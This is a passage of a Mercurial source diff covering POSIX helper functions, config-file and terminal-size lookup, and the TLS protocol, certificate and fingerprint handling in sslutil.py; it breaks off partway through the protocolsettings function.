542 if gid is None:
542 if gid is None:
543 gid = os.getgid()
543 gid = os.getgid()
544 try:
544 try:
545 return grp.getgrgid(gid)[0]
545 return grp.getgrgid(gid)[0]
546 except KeyError:
546 except KeyError:
547 return str(gid)
547 return str(gid)
548
548
549 def groupmembers(name):
549 def groupmembers(name):
550 """Return the list of members of the group with the given
550 """Return the list of members of the group with the given
551 name, KeyError if the group does not exist.
551 name, KeyError if the group does not exist.
552 """
552 """
553 return list(grp.getgrnam(name).gr_mem)
553 return list(grp.getgrnam(name).gr_mem)
554
554
555 def spawndetached(args):
555 def spawndetached(args):
556 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
556 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
557 args[0], args)
557 args[0], args)
558
558
559 def gethgcmd():
559 def gethgcmd():
560 return sys.argv[:1]
560 return sys.argv[:1]
561
561
562 def makedir(path, notindexed):
562 def makedir(path, notindexed):
563 os.mkdir(path)
563 os.mkdir(path)
564
564
565 def lookupreg(key, name=None, scope=None):
565 def lookupreg(key, name=None, scope=None):
566 return None
566 return None
567
567
568 def hidewindow():
568 def hidewindow():
569 """Hide current shell window.
569 """Hide current shell window.
570
570
571 Used to hide the window opened when starting asynchronous
571 Used to hide the window opened when starting asynchronous
572 child process under Windows, unneeded on other systems.
572 child process under Windows, unneeded on other systems.
573 """
573 """
574 pass
574 pass
575
575
576 class cachestat(object):
576 class cachestat(object):
577 def __init__(self, path):
577 def __init__(self, path):
578 self.stat = os.stat(path)
578 self.stat = os.stat(path)
579
579
580 def cacheable(self):
580 def cacheable(self):
581 return bool(self.stat.st_ino)
581 return bool(self.stat.st_ino)
582
582
583 __hash__ = object.__hash__
583 __hash__ = object.__hash__
584
584
585 def __eq__(self, other):
585 def __eq__(self, other):
586 try:
586 try:
587 # Only dev, ino, size, mtime and atime are likely to change. Out
587 # Only dev, ino, size, mtime and atime are likely to change. Out
588 # of these, we shouldn't compare atime but should compare the
588 # of these, we shouldn't compare atime but should compare the
589 # rest. However, one of the other fields changing indicates
589 # rest. However, one of the other fields changing indicates
590 # something fishy going on, so return False if anything but atime
590 # something fishy going on, so return False if anything but atime
591 # changes.
591 # changes.
592 return (self.stat.st_mode == other.stat.st_mode and
592 return (self.stat.st_mode == other.stat.st_mode and
593 self.stat.st_ino == other.stat.st_ino and
593 self.stat.st_ino == other.stat.st_ino and
594 self.stat.st_dev == other.stat.st_dev and
594 self.stat.st_dev == other.stat.st_dev and
595 self.stat.st_nlink == other.stat.st_nlink and
595 self.stat.st_nlink == other.stat.st_nlink and
596 self.stat.st_uid == other.stat.st_uid and
596 self.stat.st_uid == other.stat.st_uid and
597 self.stat.st_gid == other.stat.st_gid and
597 self.stat.st_gid == other.stat.st_gid and
598 self.stat.st_size == other.stat.st_size and
598 self.stat.st_size == other.stat.st_size and
599 self.stat.st_mtime == other.stat.st_mtime and
599 self.stat.st_mtime == other.stat.st_mtime and
600 self.stat.st_ctime == other.stat.st_ctime)
600 self.stat.st_ctime == other.stat.st_ctime)
601 except AttributeError:
601 except AttributeError:
602 return False
602 return False
603
603
604 def __ne__(self, other):
604 def __ne__(self, other):
605 return not self == other
605 return not self == other
606
606
607 def executablepath():
607 def executablepath():
608 return None # available on Windows only
608 return None # available on Windows only
609
609
610 def statislink(st):
610 def statislink(st):
611 '''check whether a stat result is a symlink'''
611 '''check whether a stat result is a symlink'''
612 return st and stat.S_ISLNK(st.st_mode)
612 return st and stat.S_ISLNK(st.st_mode)
613
613
614 def statisexec(st):
614 def statisexec(st):
615 '''check whether a stat result is an executable file'''
615 '''check whether a stat result is an executable file'''
616 return st and (st.st_mode & 0o100 != 0)
616 return st and (st.st_mode & 0o100 != 0)
617
617
618 def poll(fds):
618 def poll(fds):
619 """block until something happens on any file descriptor
619 """block until something happens on any file descriptor
620
620
621 This is a generic helper that will check for any activity
621 This is a generic helper that will check for any activity
622 (read, write. exception) and return the list of touched files.
622 (read, write. exception) and return the list of touched files.
623
623
624 In unsupported cases, it will raise a NotImplementedError"""
624 In unsupported cases, it will raise a NotImplementedError"""
625 try:
625 try:
626 while True:
626 while True:
627 try:
627 try:
628 res = select.select(fds, fds, fds)
628 res = select.select(fds, fds, fds)
629 break
629 break
630 except select.error as inst:
630 except select.error as inst:
631 if inst.args[0] == errno.EINTR:
631 if inst.args[0] == errno.EINTR:
632 continue
632 continue
633 raise
633 raise
634 except ValueError: # out of range file descriptor
634 except ValueError: # out of range file descriptor
635 raise NotImplementedError()
635 raise NotImplementedError()
636 return sorted(list(set(sum(res, []))))
636 return sorted(list(set(sum(res, []))))
637
637
638 def readpipe(pipe):
638 def readpipe(pipe):
639 """Read all available data from a pipe."""
639 """Read all available data from a pipe."""
640 # We can't fstat() a pipe because Linux will always report 0.
640 # We can't fstat() a pipe because Linux will always report 0.
641 # So, we set the pipe to non-blocking mode and read everything
641 # So, we set the pipe to non-blocking mode and read everything
642 # that's available.
642 # that's available.
643 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
643 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
644 flags |= os.O_NONBLOCK
644 flags |= os.O_NONBLOCK
645 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
645 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
646
646
647 try:
647 try:
648 chunks = []
648 chunks = []
649 while True:
649 while True:
650 try:
650 try:
651 s = pipe.read()
651 s = pipe.read()
652 if not s:
652 if not s:
653 break
653 break
654 chunks.append(s)
654 chunks.append(s)
655 except IOError:
655 except IOError:
656 break
656 break
657
657
658 return ''.join(chunks)
658 return ''.join(chunks)
659 finally:
659 finally:
660 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
660 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
661
661
662 def bindunixsocket(sock, path):
662 def bindunixsocket(sock, path):
663 """Bind the UNIX domain socket to the specified path"""
663 """Bind the UNIX domain socket to the specified path"""
664 # use relative path instead of full path at bind() if possible, since
664 # use relative path instead of full path at bind() if possible, since
665 # AF_UNIX path has very small length limit (107 chars) on common
665 # AF_UNIX path has very small length limit (107 chars) on common
666 # platforms (see sys/un.h)
666 # platforms (see sys/un.h)
667 dirname, basename = os.path.split(path)
667 dirname, basename = os.path.split(path)
668 bakwdfd = None
668 bakwdfd = None
669 if dirname:
669 if dirname:
670 bakwdfd = os.open('.', os.O_DIRECTORY)
670 bakwdfd = os.open('.', os.O_DIRECTORY)
671 os.chdir(dirname)
671 os.chdir(dirname)
672 sock.bind(basename)
672 sock.bind(basename)
673 if bakwdfd:
673 if bakwdfd:
674 os.fchdir(bakwdfd)
674 os.fchdir(bakwdfd)
675 os.close(bakwdfd)
675 os.close(bakwdfd)
@@ -1,85 +1,85 b''
1 from __future__ import absolute_import
1 from __future__ import absolute_import
2
2
3 import array
3 import array
4 import errno
4 import errno
5 import fcntl
5 import fcntl
6 import os
6 import os
7 import sys
7 import sys
8
8
9 from . import (
9 from . import (
10 encoding,
10 encoding,
11 pycompat,
11 pycompat,
12 util,
12 util,
13 )
13 )
14
14
15 # BSD 'more' escapes ANSI color sequences by default. This can be disabled by
15 # BSD 'more' escapes ANSI color sequences by default. This can be disabled by
16 # $MORE variable, but there's no compatible option with Linux 'more'. Given
16 # $MORE variable, but there's no compatible option with Linux 'more'. Given
17 # OS X is widely used and most modern Unix systems would have 'less', setting
17 # OS X is widely used and most modern Unix systems would have 'less', setting
18 # 'less' as the default seems reasonable.
18 # 'less' as the default seems reasonable.
19 fallbackpager = 'less'
19 fallbackpager = 'less'
20
20
21 def _rcfiles(path):
21 def _rcfiles(path):
22 rcs = [os.path.join(path, 'hgrc')]
22 rcs = [os.path.join(path, 'hgrc')]
23 rcdir = os.path.join(path, 'hgrc.d')
23 rcdir = os.path.join(path, 'hgrc.d')
24 try:
24 try:
25 rcs.extend([os.path.join(rcdir, f)
25 rcs.extend([os.path.join(rcdir, f)
26 for f, kind in util.listdir(rcdir)
26 for f, kind in util.listdir(rcdir)
27 if f.endswith(".rc")])
27 if f.endswith(".rc")])
28 except OSError:
28 except OSError:
29 pass
29 pass
30 return rcs
30 return rcs
31
31
32 def systemrcpath():
32 def systemrcpath():
33 path = []
33 path = []
34 if pycompat.sysplatform == 'plan9':
34 if pycompat.sysplatform == 'plan9':
35 root = 'lib/mercurial'
35 root = 'lib/mercurial'
36 else:
36 else:
37 root = 'etc/mercurial'
37 root = 'etc/mercurial'
38 # old mod_python does not set sys.argv
38 # old mod_python does not set sys.argv
39 if len(getattr(sys, 'argv', [])) > 0:
39 if len(getattr(sys, 'argv', [])) > 0:
40 p = os.path.dirname(os.path.dirname(pycompat.sysargv[0]))
40 p = os.path.dirname(os.path.dirname(pycompat.sysargv[0]))
41 if p != '/':
41 if p != '/':
42 path.extend(_rcfiles(os.path.join(p, root)))
42 path.extend(_rcfiles(os.path.join(p, root)))
43 path.extend(_rcfiles('/' + root))
43 path.extend(_rcfiles('/' + root))
44 return path
44 return path
45
45
46 def userrcpath():
46 def userrcpath():
47 if pycompat.sysplatform == 'plan9':
47 if pycompat.sysplatform == 'plan9':
48 return [encoding.environ['home'] + '/lib/hgrc']
48 return [encoding.environ['home'] + '/lib/hgrc']
49 elif pycompat.sysplatform == 'darwin':
49 elif pycompat.isdarwin:
50 return [os.path.expanduser('~/.hgrc')]
50 return [os.path.expanduser('~/.hgrc')]
51 else:
51 else:
52 confighome = encoding.environ.get('XDG_CONFIG_HOME')
52 confighome = encoding.environ.get('XDG_CONFIG_HOME')
53 if confighome is None or not os.path.isabs(confighome):
53 if confighome is None or not os.path.isabs(confighome):
54 confighome = os.path.expanduser('~/.config')
54 confighome = os.path.expanduser('~/.config')
55
55
56 return [os.path.expanduser('~/.hgrc'),
56 return [os.path.expanduser('~/.hgrc'),
57 os.path.join(confighome, 'hg', 'hgrc')]
57 os.path.join(confighome, 'hg', 'hgrc')]
58
58
59 def termsize(ui):
59 def termsize(ui):
60 try:
60 try:
61 import termios
61 import termios
62 TIOCGWINSZ = termios.TIOCGWINSZ # unavailable on IRIX (issue3449)
62 TIOCGWINSZ = termios.TIOCGWINSZ # unavailable on IRIX (issue3449)
63 except (AttributeError, ImportError):
63 except (AttributeError, ImportError):
64 return 80, 24
64 return 80, 24
65
65
66 for dev in (ui.ferr, ui.fout, ui.fin):
66 for dev in (ui.ferr, ui.fout, ui.fin):
67 try:
67 try:
68 try:
68 try:
69 fd = dev.fileno()
69 fd = dev.fileno()
70 except AttributeError:
70 except AttributeError:
71 continue
71 continue
72 if not os.isatty(fd):
72 if not os.isatty(fd):
73 continue
73 continue
74 arri = fcntl.ioctl(fd, TIOCGWINSZ, '\0' * 8)
74 arri = fcntl.ioctl(fd, TIOCGWINSZ, '\0' * 8)
75 height, width = array.array(r'h', arri)[:2]
75 height, width = array.array(r'h', arri)[:2]
76 if width > 0 and height > 0:
76 if width > 0 and height > 0:
77 return width, height
77 return width, height
78 except ValueError:
78 except ValueError:
79 pass
79 pass
80 except IOError as e:
80 except IOError as e:
81 if e[0] == errno.EINVAL:
81 if e[0] == errno.EINVAL:
82 pass
82 pass
83 else:
83 else:
84 raise
84 raise
85 return 80, 24
85 return 80, 24
@@ -1,865 +1,865 b''
1 # sslutil.py - SSL handling for mercurial
1 # sslutil.py - SSL handling for mercurial
2 #
2 #
3 # Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
4 # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
4 # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 from __future__ import absolute_import
10 from __future__ import absolute_import
11
11
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import re
14 import re
15 import ssl
15 import ssl
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 error,
19 error,
20 pycompat,
20 pycompat,
21 util,
21 util,
22 )
22 )
23
23
24 # Python 2.7.9+ overhauled the built-in SSL/TLS features of Python. It added
24 # Python 2.7.9+ overhauled the built-in SSL/TLS features of Python. It added
25 # support for TLS 1.1, TLS 1.2, SNI, system CA stores, etc. These features are
25 # support for TLS 1.1, TLS 1.2, SNI, system CA stores, etc. These features are
26 # all exposed via the "ssl" module.
26 # all exposed via the "ssl" module.
27 #
27 #
28 # Depending on the version of Python being used, SSL/TLS support is either
28 # Depending on the version of Python being used, SSL/TLS support is either
29 # modern/secure or legacy/insecure. Many operations in this module have
29 # modern/secure or legacy/insecure. Many operations in this module have
30 # separate code paths depending on support in Python.
30 # separate code paths depending on support in Python.
31
31
32 configprotocols = {
32 configprotocols = {
33 'tls1.0',
33 'tls1.0',
34 'tls1.1',
34 'tls1.1',
35 'tls1.2',
35 'tls1.2',
36 }
36 }
37
37
38 hassni = getattr(ssl, 'HAS_SNI', False)
38 hassni = getattr(ssl, 'HAS_SNI', False)
39
39
40 # TLS 1.1 and 1.2 may not be supported if the OpenSSL Python is compiled
40 # TLS 1.1 and 1.2 may not be supported if the OpenSSL Python is compiled
41 # against doesn't support them.
41 # against doesn't support them.
42 supportedprotocols = {'tls1.0'}
42 supportedprotocols = {'tls1.0'}
43 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_1'):
43 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_1'):
44 supportedprotocols.add('tls1.1')
44 supportedprotocols.add('tls1.1')
45 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_2'):
45 if util.safehasattr(ssl, 'PROTOCOL_TLSv1_2'):
46 supportedprotocols.add('tls1.2')
46 supportedprotocols.add('tls1.2')
47
47
48 try:
48 try:
49 # ssl.SSLContext was added in 2.7.9 and presence indicates modern
49 # ssl.SSLContext was added in 2.7.9 and presence indicates modern
50 # SSL/TLS features are available.
50 # SSL/TLS features are available.
51 SSLContext = ssl.SSLContext
51 SSLContext = ssl.SSLContext
52 modernssl = True
52 modernssl = True
53 _canloaddefaultcerts = util.safehasattr(SSLContext, 'load_default_certs')
53 _canloaddefaultcerts = util.safehasattr(SSLContext, 'load_default_certs')
54 except AttributeError:
54 except AttributeError:
55 modernssl = False
55 modernssl = False
56 _canloaddefaultcerts = False
56 _canloaddefaultcerts = False
57
57
58 # We implement SSLContext using the interface from the standard library.
58 # We implement SSLContext using the interface from the standard library.
59 class SSLContext(object):
59 class SSLContext(object):
60 def __init__(self, protocol):
60 def __init__(self, protocol):
61 # From the public interface of SSLContext
61 # From the public interface of SSLContext
62 self.protocol = protocol
62 self.protocol = protocol
63 self.check_hostname = False
63 self.check_hostname = False
64 self.options = 0
64 self.options = 0
65 self.verify_mode = ssl.CERT_NONE
65 self.verify_mode = ssl.CERT_NONE
66
66
67 # Used by our implementation.
67 # Used by our implementation.
68 self._certfile = None
68 self._certfile = None
69 self._keyfile = None
69 self._keyfile = None
70 self._certpassword = None
70 self._certpassword = None
71 self._cacerts = None
71 self._cacerts = None
72 self._ciphers = None
72 self._ciphers = None
73
73
74 def load_cert_chain(self, certfile, keyfile=None, password=None):
74 def load_cert_chain(self, certfile, keyfile=None, password=None):
75 self._certfile = certfile
75 self._certfile = certfile
76 self._keyfile = keyfile
76 self._keyfile = keyfile
77 self._certpassword = password
77 self._certpassword = password
78
78
79 def load_default_certs(self, purpose=None):
79 def load_default_certs(self, purpose=None):
80 pass
80 pass
81
81
82 def load_verify_locations(self, cafile=None, capath=None, cadata=None):
82 def load_verify_locations(self, cafile=None, capath=None, cadata=None):
83 if capath:
83 if capath:
84 raise error.Abort(_('capath not supported'))
84 raise error.Abort(_('capath not supported'))
85 if cadata:
85 if cadata:
86 raise error.Abort(_('cadata not supported'))
86 raise error.Abort(_('cadata not supported'))
87
87
88 self._cacerts = cafile
88 self._cacerts = cafile
89
89
90 def set_ciphers(self, ciphers):
90 def set_ciphers(self, ciphers):
91 self._ciphers = ciphers
91 self._ciphers = ciphers
92
92
93 def wrap_socket(self, socket, server_hostname=None, server_side=False):
93 def wrap_socket(self, socket, server_hostname=None, server_side=False):
94 # server_hostname is unique to SSLContext.wrap_socket and is used
94 # server_hostname is unique to SSLContext.wrap_socket and is used
95 # for SNI in that context. So there's nothing for us to do with it
95 # for SNI in that context. So there's nothing for us to do with it
96 # in this legacy code since we don't support SNI.
96 # in this legacy code since we don't support SNI.
97
97
98 args = {
98 args = {
99 'keyfile': self._keyfile,
99 'keyfile': self._keyfile,
100 'certfile': self._certfile,
100 'certfile': self._certfile,
101 'server_side': server_side,
101 'server_side': server_side,
102 'cert_reqs': self.verify_mode,
102 'cert_reqs': self.verify_mode,
103 'ssl_version': self.protocol,
103 'ssl_version': self.protocol,
104 'ca_certs': self._cacerts,
104 'ca_certs': self._cacerts,
105 'ciphers': self._ciphers,
105 'ciphers': self._ciphers,
106 }
106 }
107
107
108 return ssl.wrap_socket(socket, **args)
108 return ssl.wrap_socket(socket, **args)
109
109
110 def _hostsettings(ui, hostname):
110 def _hostsettings(ui, hostname):
111 """Obtain security settings for a hostname.
111 """Obtain security settings for a hostname.
112
112
113 Returns a dict of settings relevant to that hostname.
113 Returns a dict of settings relevant to that hostname.
114 """
114 """
115 s = {
115 s = {
116 # Whether we should attempt to load default/available CA certs
116 # Whether we should attempt to load default/available CA certs
117 # if an explicit ``cafile`` is not defined.
117 # if an explicit ``cafile`` is not defined.
118 'allowloaddefaultcerts': True,
118 'allowloaddefaultcerts': True,
119 # List of 2-tuple of (hash algorithm, hash).
119 # List of 2-tuple of (hash algorithm, hash).
120 'certfingerprints': [],
120 'certfingerprints': [],
121 # Path to file containing concatenated CA certs. Used by
121 # Path to file containing concatenated CA certs. Used by
122 # SSLContext.load_verify_locations().
122 # SSLContext.load_verify_locations().
123 'cafile': None,
123 'cafile': None,
124 # Whether certificate verification should be disabled.
124 # Whether certificate verification should be disabled.
125 'disablecertverification': False,
125 'disablecertverification': False,
126 # Whether the legacy [hostfingerprints] section has data for this host.
126 # Whether the legacy [hostfingerprints] section has data for this host.
127 'legacyfingerprint': False,
127 'legacyfingerprint': False,
128 # PROTOCOL_* constant to use for SSLContext.__init__.
128 # PROTOCOL_* constant to use for SSLContext.__init__.
129 'protocol': None,
129 'protocol': None,
130 # String representation of minimum protocol to be used for UI
130 # String representation of minimum protocol to be used for UI
131 # presentation.
131 # presentation.
132 'protocolui': None,
132 'protocolui': None,
133 # ssl.CERT_* constant used by SSLContext.verify_mode.
133 # ssl.CERT_* constant used by SSLContext.verify_mode.
134 'verifymode': None,
134 'verifymode': None,
135 # Defines extra ssl.OP* bitwise options to set.
135 # Defines extra ssl.OP* bitwise options to set.
136 'ctxoptions': None,
136 'ctxoptions': None,
137 # OpenSSL Cipher List to use (instead of default).
137 # OpenSSL Cipher List to use (instead of default).
138 'ciphers': None,
138 'ciphers': None,
139 }
139 }
140
140
141 # Allow minimum TLS protocol to be specified in the config.
141 # Allow minimum TLS protocol to be specified in the config.
142 def validateprotocol(protocol, key):
142 def validateprotocol(protocol, key):
143 if protocol not in configprotocols:
143 if protocol not in configprotocols:
144 raise error.Abort(
144 raise error.Abort(
145 _('unsupported protocol from hostsecurity.%s: %s') %
145 _('unsupported protocol from hostsecurity.%s: %s') %
146 (key, protocol),
146 (key, protocol),
147 hint=_('valid protocols: %s') %
147 hint=_('valid protocols: %s') %
148 ' '.join(sorted(configprotocols)))
148 ' '.join(sorted(configprotocols)))
149
149
150 # We default to TLS 1.1+ where we can because TLS 1.0 has known
150 # We default to TLS 1.1+ where we can because TLS 1.0 has known
151 # vulnerabilities (like BEAST and POODLE). We allow users to downgrade to
151 # vulnerabilities (like BEAST and POODLE). We allow users to downgrade to
152 # TLS 1.0+ via config options in case a legacy server is encountered.
152 # TLS 1.0+ via config options in case a legacy server is encountered.
153 if 'tls1.1' in supportedprotocols:
153 if 'tls1.1' in supportedprotocols:
154 defaultprotocol = 'tls1.1'
154 defaultprotocol = 'tls1.1'
155 else:
155 else:
156 # Let people know they are borderline secure.
156 # Let people know they are borderline secure.
157 # We don't document this config option because we want people to see
157 # We don't document this config option because we want people to see
158 # the bold warnings on the web site.
158 # the bold warnings on the web site.
159 # internal config: hostsecurity.disabletls10warning
159 # internal config: hostsecurity.disabletls10warning
160 if not ui.configbool('hostsecurity', 'disabletls10warning'):
160 if not ui.configbool('hostsecurity', 'disabletls10warning'):
161 ui.warn(_('warning: connecting to %s using legacy security '
161 ui.warn(_('warning: connecting to %s using legacy security '
162 'technology (TLS 1.0); see '
162 'technology (TLS 1.0); see '
163 'https://mercurial-scm.org/wiki/SecureConnections for '
163 'https://mercurial-scm.org/wiki/SecureConnections for '
164 'more info\n') % hostname)
164 'more info\n') % hostname)
165 defaultprotocol = 'tls1.0'
165 defaultprotocol = 'tls1.0'
166
166
167 key = 'minimumprotocol'
167 key = 'minimumprotocol'
168 protocol = ui.config('hostsecurity', key, defaultprotocol)
168 protocol = ui.config('hostsecurity', key, defaultprotocol)
169 validateprotocol(protocol, key)
169 validateprotocol(protocol, key)
170
170
171 key = '%s:minimumprotocol' % hostname
171 key = '%s:minimumprotocol' % hostname
172 protocol = ui.config('hostsecurity', key, protocol)
172 protocol = ui.config('hostsecurity', key, protocol)
173 validateprotocol(protocol, key)
173 validateprotocol(protocol, key)
174
174
175 # If --insecure is used, we allow the use of TLS 1.0 despite config options.
175 # If --insecure is used, we allow the use of TLS 1.0 despite config options.
176 # We always print a "connection security to %s is disabled..." message when
176 # We always print a "connection security to %s is disabled..." message when
177 # --insecure is used. So no need to print anything more here.
177 # --insecure is used. So no need to print anything more here.
178 if ui.insecureconnections:
178 if ui.insecureconnections:
179 protocol = 'tls1.0'
179 protocol = 'tls1.0'
180
180
181 s['protocol'], s['ctxoptions'], s['protocolui'] = protocolsettings(protocol)
181 s['protocol'], s['ctxoptions'], s['protocolui'] = protocolsettings(protocol)
182
182
183 ciphers = ui.config('hostsecurity', 'ciphers')
183 ciphers = ui.config('hostsecurity', 'ciphers')
184 ciphers = ui.config('hostsecurity', '%s:ciphers' % hostname, ciphers)
184 ciphers = ui.config('hostsecurity', '%s:ciphers' % hostname, ciphers)
185 s['ciphers'] = ciphers
185 s['ciphers'] = ciphers
186
186
187 # Look for fingerprints in [hostsecurity] section. Value is a list
187 # Look for fingerprints in [hostsecurity] section. Value is a list
188 # of <alg>:<fingerprint> strings.
188 # of <alg>:<fingerprint> strings.
189 fingerprints = ui.configlist('hostsecurity', '%s:fingerprints' % hostname,
189 fingerprints = ui.configlist('hostsecurity', '%s:fingerprints' % hostname,
190 [])
190 [])
191 for fingerprint in fingerprints:
191 for fingerprint in fingerprints:
192 if not (fingerprint.startswith(('sha1:', 'sha256:', 'sha512:'))):
192 if not (fingerprint.startswith(('sha1:', 'sha256:', 'sha512:'))):
193 raise error.Abort(_('invalid fingerprint for %s: %s') % (
193 raise error.Abort(_('invalid fingerprint for %s: %s') % (
194 hostname, fingerprint),
194 hostname, fingerprint),
195 hint=_('must begin with "sha1:", "sha256:", '
195 hint=_('must begin with "sha1:", "sha256:", '
196 'or "sha512:"'))
196 'or "sha512:"'))
197
197
198 alg, fingerprint = fingerprint.split(':', 1)
198 alg, fingerprint = fingerprint.split(':', 1)
199 fingerprint = fingerprint.replace(':', '').lower()
199 fingerprint = fingerprint.replace(':', '').lower()
200 s['certfingerprints'].append((alg, fingerprint))
200 s['certfingerprints'].append((alg, fingerprint))
201
201
202 # Fingerprints from [hostfingerprints] are always SHA-1.
202 # Fingerprints from [hostfingerprints] are always SHA-1.
203 for fingerprint in ui.configlist('hostfingerprints', hostname, []):
203 for fingerprint in ui.configlist('hostfingerprints', hostname, []):
204 fingerprint = fingerprint.replace(':', '').lower()
204 fingerprint = fingerprint.replace(':', '').lower()
205 s['certfingerprints'].append(('sha1', fingerprint))
205 s['certfingerprints'].append(('sha1', fingerprint))
206 s['legacyfingerprint'] = True
206 s['legacyfingerprint'] = True
207
207
208 # If a host cert fingerprint is defined, it is the only thing that
208 # If a host cert fingerprint is defined, it is the only thing that
209 # matters. No need to validate CA certs.
209 # matters. No need to validate CA certs.
210 if s['certfingerprints']:
210 if s['certfingerprints']:
211 s['verifymode'] = ssl.CERT_NONE
211 s['verifymode'] = ssl.CERT_NONE
212 s['allowloaddefaultcerts'] = False
212 s['allowloaddefaultcerts'] = False
213
213
214 # If --insecure is used, don't take CAs into consideration.
214 # If --insecure is used, don't take CAs into consideration.
215 elif ui.insecureconnections:
215 elif ui.insecureconnections:
216 s['disablecertverification'] = True
216 s['disablecertverification'] = True
217 s['verifymode'] = ssl.CERT_NONE
217 s['verifymode'] = ssl.CERT_NONE
218 s['allowloaddefaultcerts'] = False
218 s['allowloaddefaultcerts'] = False
219
219
220 if ui.configbool('devel', 'disableloaddefaultcerts'):
220 if ui.configbool('devel', 'disableloaddefaultcerts'):
221 s['allowloaddefaultcerts'] = False
221 s['allowloaddefaultcerts'] = False
222
222
223 # If both fingerprints and a per-host ca file are specified, issue a warning
223 # If both fingerprints and a per-host ca file are specified, issue a warning
224 # because users should not be surprised about what security is or isn't
224 # because users should not be surprised about what security is or isn't
225 # being performed.
225 # being performed.
226 cafile = ui.config('hostsecurity', '%s:verifycertsfile' % hostname)
226 cafile = ui.config('hostsecurity', '%s:verifycertsfile' % hostname)
227 if s['certfingerprints'] and cafile:
227 if s['certfingerprints'] and cafile:
228 ui.warn(_('(hostsecurity.%s:verifycertsfile ignored when host '
228 ui.warn(_('(hostsecurity.%s:verifycertsfile ignored when host '
229 'fingerprints defined; using host fingerprints for '
229 'fingerprints defined; using host fingerprints for '
230 'verification)\n') % hostname)
230 'verification)\n') % hostname)
231
231
232 # Try to hook up CA certificate validation unless something above
232 # Try to hook up CA certificate validation unless something above
233 # makes it not necessary.
233 # makes it not necessary.
234 if s['verifymode'] is None:
234 if s['verifymode'] is None:
235 # Look at per-host ca file first.
235 # Look at per-host ca file first.
236 if cafile:
236 if cafile:
237 cafile = util.expandpath(cafile)
237 cafile = util.expandpath(cafile)
238 if not os.path.exists(cafile):
238 if not os.path.exists(cafile):
239 raise error.Abort(_('path specified by %s does not exist: %s') %
239 raise error.Abort(_('path specified by %s does not exist: %s') %
240 ('hostsecurity.%s:verifycertsfile' % hostname,
240 ('hostsecurity.%s:verifycertsfile' % hostname,
241 cafile))
241 cafile))
242 s['cafile'] = cafile
242 s['cafile'] = cafile
243 else:
243 else:
244 # Find global certificates file in config.
244 # Find global certificates file in config.
245 cafile = ui.config('web', 'cacerts')
245 cafile = ui.config('web', 'cacerts')
246
246
247 if cafile:
247 if cafile:
248 cafile = util.expandpath(cafile)
248 cafile = util.expandpath(cafile)
249 if not os.path.exists(cafile):
249 if not os.path.exists(cafile):
250 raise error.Abort(_('could not find web.cacerts: %s') %
250 raise error.Abort(_('could not find web.cacerts: %s') %
251 cafile)
251 cafile)
252 elif s['allowloaddefaultcerts']:
252 elif s['allowloaddefaultcerts']:
253 # CAs not defined in config. Try to find system bundles.
253 # CAs not defined in config. Try to find system bundles.
254 cafile = _defaultcacerts(ui)
254 cafile = _defaultcacerts(ui)
255 if cafile:
255 if cafile:
256 ui.debug('using %s for CA file\n' % cafile)
256 ui.debug('using %s for CA file\n' % cafile)
257
257
258 s['cafile'] = cafile
258 s['cafile'] = cafile
259
259
260 # Require certificate validation if CA certs are being loaded and
260 # Require certificate validation if CA certs are being loaded and
261 # verification hasn't been disabled above.
261 # verification hasn't been disabled above.
262 if cafile or (_canloaddefaultcerts and s['allowloaddefaultcerts']):
262 if cafile or (_canloaddefaultcerts and s['allowloaddefaultcerts']):
263 s['verifymode'] = ssl.CERT_REQUIRED
263 s['verifymode'] = ssl.CERT_REQUIRED
264 else:
264 else:
265 # At this point we don't have a fingerprint, aren't being
265 # At this point we don't have a fingerprint, aren't being
266 # explicitly insecure, and can't load CA certs. Connecting
266 # explicitly insecure, and can't load CA certs. Connecting
267 # is insecure. We allow the connection and abort during
267 # is insecure. We allow the connection and abort during
268 # validation (once we have the fingerprint to print to the
268 # validation (once we have the fingerprint to print to the
269 # user).
269 # user).
270 s['verifymode'] = ssl.CERT_NONE
270 s['verifymode'] = ssl.CERT_NONE
271
271
272 assert s['protocol'] is not None
272 assert s['protocol'] is not None
273 assert s['ctxoptions'] is not None
273 assert s['ctxoptions'] is not None
274 assert s['verifymode'] is not None
274 assert s['verifymode'] is not None
275
275
276 return s
276 return s
277
277
def protocolsettings(protocol):
    """Resolve the protocol for a config value.

    Returns a 3-tuple of (protocol, options, ui value) where the first
    2 items are values used by SSLContext and the last is a string value
    of the ``minimumprotocol`` config option equivalent.

    Raises ``ValueError`` for protocol values outside ``configprotocols``
    and aborts when the running Python cannot honor the requested minimum.
    """
    if protocol not in configprotocols:
        raise ValueError('protocol value not supported: %s' % protocol)

    # Legacy ssl stacks can only speak TLS 1.0. On such a stack the only
    # satisfiable config value is "tls1.0" and we must pin PROTOCOL_TLSv1
    # directly: despite its name, PROTOCOL_SSLv23 negotiates the highest
    # protocol both peers support, but selectively disabling protocol
    # versions via SSLContext.options requires the full/real SSLContext,
    # which a legacy stack does not provide.
    if supportedprotocols == {'tls1.0'}:
        if protocol != 'tls1.0':
            raise error.Abort(_('current Python does not support protocol '
                                'setting %s') % protocol,
                              hint=_('upgrade Python or disable setting since '
                                     'only TLS 1.0 is supported'))

        return ssl.PROTOCOL_TLSv1, 0, 'tls1.0'

